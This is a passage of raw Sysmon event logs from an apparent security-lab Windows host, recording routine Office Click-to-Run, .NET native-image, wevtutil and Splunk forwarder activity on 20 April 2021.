orsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.279{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.279{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.279{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.232{A7A01FEF-EBF9-607E-F40D-00000000BB01}53324816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.201{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FA0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.186{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FA0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.186{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FA0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000077140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.186{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\TypeDWORD (0x00000002) 13241300x800000000000000077139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.186{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\IsolationDWORD (0x00000000) 13241300x800000000000000077138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.186{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\OwningPublisher{f562bb8e-422d-4b5c-b20e-90d710f7d11c} 18141800x800000000000000077137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.154{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.139{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-F90D-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.107{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-F90D-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.107{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-F90D-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000077133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.092{A7A01FEF-EBFA-607E-F80D-00000000BB01}51686396C:\Windows\system32\conhost.exe{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.092{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-F80D-00000000BB01}5168C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.076{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.076{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.076{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44723180C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.090{A7A01FEF-EBFA-607E-F70D-00000000BB01}5076C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man" /rf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll" /mf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000077124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.076{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.manMD5=696F2B52D9A66D646A0D741419E96250,SHA256=06CD20E1AD0F7B3681BF98673C38254DF610B46E21556A76250A434637D29BEF,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 18141800x800000000000000077123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 